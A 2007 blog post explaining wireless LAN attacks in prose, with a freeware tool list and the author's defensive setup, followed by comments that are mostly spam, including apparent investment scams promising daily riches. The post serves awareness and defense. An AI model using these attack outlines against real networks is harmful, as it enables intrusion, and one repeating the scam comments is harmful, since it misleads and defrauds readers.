Saturday, April 28, 2007

Want To Know Generaly About Wireless Hacking??

Wireless Attacks Explained


Intro
Wireless LANs are popping up here, there and everywhere. Many businesses are implementing wireless LAN segments on their internal LANs because it is easy to setup and obviously there are no wires to run.

Wireless allows users with laptops and other mobile devices to roam the enterprise and not have to plug in wherever they go. As part of the process of implementing a wireless network segment on the corporate LAN of the company that I presently work for, I did some research and testing of wireless security. This white paper outlines how hackers are exploiting vulnerabilities in 802.11 wireless LANs and the widely available wireless hacking tools that are used.

Too often people think that because the setup of a wireless segment is literally plug and go that everything is functioning properly and securely. Wireless is a virtual playground for hackers, the technology is still quite new, most admins are not anywhere near up to speed on it and security protocols and procedures are still being developed; giving quick-learning hackers the edge.

Any wireless access point attached to a network segment is essentially bridging the internal network to the surrounding area directly, without any firewall protection. After only installing one low-budget wireless access point (WAP) I could get access to the LAN anywhere in the shop, the office and in the parking lot!! I don't know how many square feet of shop floor and office space we have, but it isn't small. I was getting 15% connection strength sitting in my car in the parking lot!! Without proper security measures for authentication, any laptop with a wireless card can access the network or stealthy listen in on all network traffic across that access point from any area within the WAPs range.

It is important to realize the potential for rogue wireless access points in an enterprise. WAPs can be hooked up by anyone, just take the cable plugging into your computer and plug it into a WAP, throw a wireless card into your PC and you now have a wireless segment. The network admins wouldn't even know. There are several documented cases of rogue WAPs
found in corporations and universities.

The Hackers WLAN toolbox:
This section provides a few examples of the hardware and freeware tools available.

Freeware Tools:
New wireless LAN hacking tools are introduced every week and are widely available on the Internet for anyone to
download. The table below lists some of these hacking tools:

Netstumbler
www.netstumbler.com
Freeware wireless access point identifier - listens for SSIDs & sends beacons as probes searching for access points
Kismet
www.kismetwireless.net
Freeware wireless sniffer and monitor - passively monitors wireless traffic & sorts data to identify SSIDs, MAC addresses, channels and connection speeds
Wellenreiter
packetstormsecurity.nl
Freeware WLAN discovery tool - Uses brute force to identify low traffic access points; hides your real MAC; integrates with GPS
THC-RUT
www.thehackerschoice.com
Freeware WLAN discovery tool - Uses brute force to identify low traffic access points
Ethereal
www.ethereal.com
Freeware WLAN analyzer - interactively browse the capture data, viewing summary and detail information for all observed wireless traffic
WEPCrack
wepcrack.sourceforge.net
Freeware encryption breaker - Cracks 802.11 WEP encryption keys using the latest discovered weakness of RC4 key scheduling
AirSnort
airsnort.shmoo.com
Freeware encryption breaker - passively monitoring transmissions, computing the encryption key when enough packets have been gathered
HostAP
hostap.epitest.fi
Converts a WLAN station to function as an access point; (Available for WLAN cards that are based on Intersil's Prism2/2.5/3 chipset)


Antennas:
To connect with wireless LANs from distances greater than a few hundred feet, sophisticated hackers use long-range antennas that are either commercially available or home built and can pick up 802.11 signals from up to 2,000 feet away. The intruders could be in the parking lot or completely out of sight.

Breaking Encryption:
The industry's initial encryption technology, WEP, was quickly broken by published tools WEPCrack and AirSnort, which exploit vulnerabilities in the WEP encryption algorithm. WEPCrack and AirSnort passively observe WLAN traffic until it collects enough data by which it recognizes repetitions and breaks the encryption key.

Authentication:
The next step in the evolution of wireless LAN security was the introduction of 802.1x for port-based authentication. However, papers have already been published to demonstrate how the newly proposed standard can be defeated. A new standard is expected to be designed within the next two years.

War Driving:
War driving is simply driving around in a car to discover unprotected wireless LANs. Windows-based freeware tools such as NetStumbler, probe the airwaves in search of access points that broadcast their SSIDs and offer easy ways to find open networks. More advanced tools, such as Kismet, were then introduced on Linux platforms to passively monitor wireless traffic.

Both Netstumbler and Kismet work in tandem with a global positioning system (GPS) to map exact locations of the identified WLANs. These maps and data are posted on web sites such as www.wigle.net and www.wifinder.com.


Attacks explained

Malicious Association:
Using widely available tools, hackers can force unsuspecting stations to connect to an undesired 802.11 network or alter the configuration of the station to operate in ad-hoc networking mode. A hacker begins this attack by using freeware HostAP to convert the attacking station to operate as a functioning access point. As the victim's station broadcasts a probe to associate with an access point, the hacker's new malicious access point responds to the victim's request for association and begins a connection between the two. After providing an IP address to the victim's workstation (if needed), the malicious access point can begin its attacks. The hacker - acting as an access point - can use a wealth of available hacking tools available that have been tested and proven in a wireless environment. At this time, the hacker can exploit all vulnerabilities on the victim's laptop, which can include installing the HostAP firmware or any other laptop configuration or programmatic changes.
The malicious association attack shows that wireless LANs are subject to diversion and stations do not always know which network or access point they connect to. Stations can be tricked or forced to connect to a malicious access point. Even wireless LANs that have deployed VPNs are vulnerable to malicious associations. This attack does not try to break the VPN. Rather, it takes over the security-poor client.

Enterprises must monitor the airwaves of their wireless LAN to make sure their stations only connect to authorized access points and networks. Monitoring the network is the only way to know whom your stations connect to and which stations connect to your access points.

MAC Spoofing - Identity theft:
Many enterprises secure their wireless LAN with authentication based on an authorized list of MAC addresses. While this provides a low level of security for smaller deployments, MAC addresses were never intended to be used in this manner. Any user can easily change the MAC address of a station or access point to change its 'identity' and defeat MAC address-based authentication.

Software tools such as Kismet or Ethereal, are available for hackers to easily pick off the MAC addresses of an authorized user. The hacker can then assume the identity of that user by asserting the stolen MAC address as his own. The hacker then connects to the wireless LAN as an authorized user.

By monitoring the airwaves of their wireless LAN, enterprises are able to detect MAC spoofing by identifying when more than one MAC address is simultaneously on the network. Wireless LAN intrusion detection systems also identify when a MAC address is spoofed by analyzing the vendor 'fingerprints' of the wireless LAN card. This enables the IDS to see when, for example, a Orinoco wireless LAN card connects to the network using a MAC address of a Cisco WLAN card.

Man-in-the-middle Attacks:
As one of the more sophisticated attacks, a man-in-the-middle attack can break a secure VPN connection between an authorized station and an access point. By inserting a malicious station between the victim station and the access point, the hacker becomes the "man in the middle" as he tricks the station into believing that he is the access point and tricks the access point into thinking he is the station.

This attack preys upon an authentication implementation to randomly force a connected station to re-authenticate with the access point. The station must respond to a random challenge from the access point, and the access point must respond to a successful challenge response with a success packet.

To begin this attack, the hacker passively observes the station as it connects to the access point, and the hacker collects the authentication information, including the username, server name, client and server IP address, the ID used to compute the response, and the challenge and associate response.

The hacker then tries to associate with the access point by sending a request that appears to be coming from the authenticated station. The access point sends the VPN challenge to the authenticated station, which computes the required authentic response, and sends the response to the access point. The hacker observes the valid response. The hacker then acts as the access point in presenting a challenge to the authorized station. The station computes the appropriate response, which is sent to the access point. The access point then sends the station a success
packet with an imbedded sequence number. Both are captured by the hacker. After capturing all this data, the hacker then has what he needs to complete the attack and defeat the VPN. The hacker sends a spoofed reply, with large sequence number, which bumps the victim's station off the network and keeps it from re-associating (ie 0x00ffffff). The hacker then enters the network as the authorized station.

Only 24/7 monitoring and a highly capable wireless IDS can detect this type of attack on a wireless LAN. An effective security solution must first keep a constant watch over the wireless LAN while it analyzes the activity it observes.

Denial-of-Service Attacks:
Every network and security manager fears the downtime and loss of productivity from a crippling Denial-of-Service attack. In the wireless world, this damaging attack can come from any direction, and the most basic variations of DoS attacks can be just as worrisome as the most sophisticated.

Because 802.11b wireless LANs operate on the unregulated 2.4GHz radio frequency that is also used by microwave ovens, baby monitors, and cordless phones, commonly available consumer products can give hackers the tools for a simple and extremely damaging DoS attack. Unleashing large amounts of noise from these other devices can jam the airwaves and shut down a wireless LAN.

Hackers can launch more sophisticated DoS attacks by configuring a station to operate as an access point. As as access point, the hacker can flood the airwaves with persistent disassociate commands that force all stations
within range to disconnect from the wireless LAN. In another variation, the hacker's malicious access point broadcasts periodic disassociate commands every few minutes that causes a situation where stations are continually kicked off the network, reconnected, and kicked off again.

In addition to malicious disassociation attacks, hackers are now abusing the Extensible Authentication Protocol (EAP) to launch DoS attacks. There are several forms of DoS attacks from various ways a hacker can manipulate EAP protocols by targeting wireless stations and access points with log-off commands, start commands, premature successful connection messages, failure messages, and other modifications of the EAP protocol.

Conclusion:
To better secure a wireless network segment, a layered approach should be used. Similar to a wired network infrastructure, I have implemented several security features that each alone would not be sufficient, but together with monitoring create a much more secure WLAN. On my network there is only one access point and one wireless user to date, so the traffic can be monitored from an old laptop that I have on my desk running RedHat.I occasionally boot up and trap sections of traffic to look for any attack signatures. We are also not located in a city or industrial complex and our grounds are quite large and secured. The user is connecting via a vpn, the access point is secured so it cannot be reset, WEP is enabled, the access point is in a position that limits travel of the radio frequency outside of the building, and mine and the mobile user's MAC addresses are the only two that are registered with the access point. I also check for rogue access points, as every other laptop user wants to be mobile now as well. The traffic between the access point and the LAN passes through a firewall to help block any possible DoS attacks on the wireless LAN from entering the enterprise LAN.

Wireless networks are a great alternative or addition to ethernet networks, they can bridge two segments of traditional cable ethernet network segments or allow laptop users to wander the enterprise and stay connected to the LAN at all times. WLANs are definitely here to stay, but pose definite security issues.


14 comments:

Anonymous said...

I would like to read the article but it is impossible to see green on black.

Get some web skllz dude.

Biggest_Baddest_Wolf said...

About the article:
The author adds to what many are voicing already, and have been voicing for a while; that people need to be aware of how their stuff is set up, and act upon that awareness by taking a good look at how to secure their stuff.
I'm all for "open access anywhere" but I'm also for spreading the knowledge so companies can stay in business and pay their employees and offer their services without as much risk.

About the green on black:
I can read it just fine, the commenter should get a better monitor and some glasses.

Anonymous said...

Hello !.
You re, I guess , perhaps curious to know how one can collect a huge starting capital .
There is no initial capital needed You may begin to get income with as small sum of money as 20-100 dollars.

AimTrust is what you need
AimTrust represents an offshore structure with advanced asset management technologies in production and delivery of pipes for oil and gas.

Its head office is in Panama with structures everywhere: In USA, Canada, Cyprus.
Do you want to become an affluent person?
That`s your choice That`s what you wish in the long run!

I feel good, I began to take up income with the help of this company,
and I invite you to do the same. It`s all about how to choose a correct partner who uses your funds in a right way - that`s AimTrust!.
I take now up to 2G every day, and my first investment was 500 dollars only!
It`s easy to join , just click this link http://qytuduxap.arcadepages.com/rikavyg.html
and lucky you`re! Let`s take our chance together to become rich

Anonymous said...

Hello !.
You may , perhaps very interested to know how one can reach 2000 per day of income .
There is no initial capital needed You may start to receive yields with as small sum of money as 20-100 dollars.

AimTrust is what you need
AimTrust incorporates an offshore structure with advanced asset management technologies in production and delivery of pipes for oil and gas.

It is based in Panama with structures everywhere: In USA, Canada, Cyprus.
Do you want to become a happy investor?
That`s your chance That`s what you desire!

I feel good, I began to get income with the help of this company,
and I invite you to do the same. It`s all about how to select a proper companion utilizes your savings in a right way - that`s it!.
I earn US$2,000 per day, and my first deposit was 1 grand only!
It`s easy to start , just click this link http://aduqujikig.jamminweb.com/dilihihu.html
and lucky you`re! Let`s take this option together to become rich

Anonymous said...

Can anyone recommend the robust Network Monitoring system for a small IT service company like mine? Does anyone use Kaseya.com or GFI.com? How do they compare to these guys I found recently: N-able N-central remote windows login
? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!

Anonymous said...

Hello!
You may probably be very interested to know how one can make real money on investments.
There is no initial capital needed.
You may begin to get income with a money that usually is spent
on daily food, that's 20-100 dollars.
I have been participating in one company's work for several years,
and I'll be glad to share my secrets at my blog.

Please visit blog and send me private message to get the info.

P.S. I make 1000-2000 per daily now.

[url=http://theblogmoney.com] Online investment blog[/url]

Anonymous said...

Hi there!
I would like to burn a theme at here. There is such a thing, called HYIP, or High Yield Investment Program. It reminds of financial piramyde, but in rare cases one may happen to meet a company that really pays up to 2% daily not on invested money, but from real profits.

For quite a long time, I earn money with the help of these programs.
I'm with no money problems now, but there are heights that must be conquered . I get now up to 2G a day , and my first investment was 500 dollars only.
Right now, I managed to catch a guaranteed variant to make a sharp rise . Turn to my blog to get additional info.

http://theblogmoney.com

Anonymous said...

Hi!
You may probably be very interested to know how one can manage to receive high yields on investments.
There is no need to invest much at first.
You may begin to get income with a money that usually is spent
on daily food, that's 20-100 dollars.
I have been participating in one project for several years,
and I'm ready to share my secrets at my blog.

Please visit my pages and send me private message to get the info.

P.S. I make 1000-2000 per daily now.

http://theinvestblog.com [url=http://theinvestblog.com]Online Investment Blog[/url]

Anonymous said...

[B]NZBsRus.com[/B]
Lose Idle Downloads With NZB Files You Can Swiftly Find High Quality Movies, PC Games, MP3s, Applications & Download Them @ Fast Rates

[URL=http://www.nzbsrus.com][B]NZB[/B][/URL]

Anonymous said...

Glad to greet you, ladies and gentlemen!

For sure you didn’t here about me yet,
my name is Nikolas.
Generally I’m a social gmabler. all my life I’m carried away by online-casino and poker.
Not long time ago I started my own blog, where I describe my virtual adventures.
Probably, it will be interesting for you to find out about my progress.
Please visit my web page . http://allbestcasino.com I’ll be glad would you find time to leave your opinion.

Anonymous said...

Glad to greet you, ladies and gentlemen!

We are not acquainted yet? It’s easy to fix,
my name is Peter.
Generally I’m a venturesome gambler. all my life I’m carried away by online-casino and poker.
Not long time ago I started my own blog, where I describe my virtual adventures.
Probably, it will be interesting for you to read my notes.
Please visit my web page . http://allbestcasino.com I’ll be glad would you find time to leave your opinion.

Anonymous said...

sex [url=http://pornushi.ru/english-version/young-girls-pussys/site-402.html]escort girl 34[/url]

Anonymous said...

Hi, I'm a newbie here, but I already want to bring all the benefits of me :) So, I want to share my experience with you..
9 days ago, accidentally, i had found the Mobile Phone TV...and I was so delighted with this application
that I decided to talk to you :)

I consider myself a bit of a road warrior. I am on and off jets and through airports at least twice,
usually 4 times a week. I can catch up on news, watch a Discovery program, check up on the stock market or just find something interesting.
The live guide works like cable at home and the connection speed is very good. All in ALL - I RATE A 5 Star program!

but I do not want to leave any links here, so you can email me fairyalexiss@gmail.com
and i will give you the site of this unusual program :)

(but please don't PM me, because it's so difficult to communicate in such kind of way)

so, I hope I was helpful to you)) see you in next posts ..

sincerely
your Alexis....

p.s. English is not my native language, so sorry for any mistakes :)

Alex said...

Take a look here:

http://hakin9.org?a_aid=olgapawlik&a_bid=8f6377e8

Was a good start for me ;)